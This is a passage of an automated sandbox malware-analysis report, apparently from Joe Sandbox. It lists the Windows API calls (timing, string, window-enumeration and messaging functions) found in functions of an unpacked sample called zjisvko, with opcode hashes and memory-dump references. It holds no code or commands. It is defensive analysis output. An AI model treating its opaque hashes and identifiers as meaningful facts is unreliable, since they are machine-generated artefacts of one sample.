                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ff5e123241310e84f5d937806fdfd97bc892e57cf58ef5ee357e48b1a968bb9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0941D430604744DFC720EF69D8859AAFBE1FF04304B55896FE08A87652CB39E894CB5E
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 0041F8B9: GetTickCount.KERNEL32 ref: 0041F92B
                                                                                                                                                                                                                                                        • Part of subcall function 0041F8B9: lstrlenA.KERNEL32(?), ref: 0041F966
                                                                                                                                                                                                                                                        • Part of subcall function 0041F8B9: lstrcatA.KERNEL32(?,0042A4E0), ref: 0041F985
                                                                                                                                                                                                                                                        • Part of subcall function 0041F8B9: lstrcatA.KERNEL32(?,0042A4E0), ref: 0041F990
                                                                                                                                                                                                                                                        • Part of subcall function 0041F8B9: lstrcatA.KERNEL32(?,0042A4E0), ref: 0041F99B
                                                                                                                                                                                                                                                        • Part of subcall function 0041F8B9: lstrlenA.KERNEL32(?), ref: 0041F9A2
                                                                                                                                                                                                                                                        • Part of subcall function 0041F8B9: lstrcatA.KERNEL32(?,0042A4E0), ref: 0041F9B2
                                                                                                                                                                                                                                                      • lstrcmpiA.KERNEL32(?,?), ref: 00420951
                                                                                                                                                                                                                                                      • lstrcpynA.KERNEL32(00000000,?,00000078,?,?,00000000), ref: 00420967
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0042098A
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(000003E8,?,?,00000000), ref: 004209D1
                                                                                                                                                                                                                                                        • Part of subcall function 004202CD: GetTickCount.KERNEL32 ref: 00420325
                                                                                                                                                                                                                                                        • Part of subcall function 004202CD: Sleep.KERNEL32(0000012C), ref: 00420331
                                                                                                                                                                                                                                                        • Part of subcall function 004202CD: GetTickCount.KERNEL32 ref: 00420366
                                                                                                                                                                                                                                                        • Part of subcall function 004202CD: lstrlenA.KERNEL32(00000000,?,?,?,?,?), ref: 0042038A
                                                                                                                                                                                                                                                        • Part of subcall function 004202CD: GetTickCount.KERNEL32 ref: 00420393
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CountTick$lstrcat$lstrlen$Sleep$lstrcmpilstrcpyn
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 4241744780-0
                                                                                                                                                                                                                                                      • Opcode ID: a5797a3337ac284f49606b989114822fa8f6a7677816d38e25a2feba24009512
                                                                                                                                                                                                                                                      • Instruction ID: e1c63eb699c4a579d3e53cbe12f8c53483fa5a3500a6c19c00d829c2c369af7d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a5797a3337ac284f49606b989114822fa8f6a7677816d38e25a2feba24009512
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D331E371B003289FEF20CF64D805BEB77E4AF04314F50096EE95696293DB789989CB54
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0045B020), ref: 0041D055
                                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0041D066
                                                                                                                                                                                                                                                      • SendMessageA.USER32(0000004A,00000000), ref: 0041D082
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(0045B020), ref: 0041D092
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeaveMessageSendlstrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2615675618-0
                                                                                                                                                                                                                                                      • Opcode ID: 7c74f56ab4b2f4d99c8cf02e5dac5e513ef1ef44eafc1b19ff3713757b601000
                                                                                                                                                                                                                                                      • Instruction ID: 04bdf258bc530c0cdee2ac19c1b7621b2973c0a551cbe2d9e9c14f2e41fc7480
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c74f56ab4b2f4d99c8cf02e5dac5e513ef1ef44eafc1b19ff3713757b601000
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59F08271900304EBCB119FA4EC08B9E7BB8EB09302F008075ED16E2161D73486559BAE
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 004218F5
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0045A330), ref: 00421905
                                                                                                                                                                                                                                                      • EnumWindows.USER32(0042108F,00000000), ref: 00421912
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000F), ref: 0042191A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000004.00000002.208992077365.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208991980162.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992221969.000000000042A000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992308531.000000000042E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992423240.000000000042F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992579086.0000000000448000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992667485.0000000000449000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992771455.000000000044E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000458000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000463000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000004.00000002.208992881645.0000000000465000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_400000_zjisvko.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Sleep$CriticalEnterEnumSectionWindows
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2151141519-0
                                                                                                                                                                                                                                                      • Opcode ID: 73382d69a21fc8b10e3f2b6feb81f70276a3830f2d7b93a82bb811b2617987ba
                                                                                                                                                                                                                                                      • Instruction ID: d93265669e9007938a92f4f787627f2676029b5fa9748b48d493c5193711b42f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 73382d69a21fc8b10e3f2b6feb81f70276a3830f2d7b93a82bb811b2617987ba
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5AE01234BC8365B7E5206791BC4BB2626109B1AF16FE04033BE05251F189ED1576DBAF